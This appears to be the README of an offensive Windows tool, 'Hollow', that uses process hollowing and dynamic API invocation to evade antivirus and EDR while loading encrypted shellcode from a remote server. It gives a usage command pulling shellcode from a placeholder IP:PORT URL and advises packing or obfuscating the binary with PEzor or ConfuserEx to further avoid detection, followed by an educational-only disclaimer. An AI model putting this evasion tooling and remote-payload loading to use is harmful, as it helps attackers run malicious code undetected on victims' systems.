Hollow
Trying to evade AV/EDRs using Process hollowing with standalone dynamic invocation avoiding suspicious imports and API Hooks and loading remote AES or xor encrypted shellcode
Usage
Example:
.\H0ll0w.exe -u http://IP:PORT/shellcode.bin -e AES -k "KEY"To further evade detection, it is recommended to pack the executable with PEzor or scramble and obfuscate it with ConfuserEx.
Refs
Disclaimer
This repository is for educational purposes only and should not be used for malicious purposes. The author is not responsible for any illegal use of the code.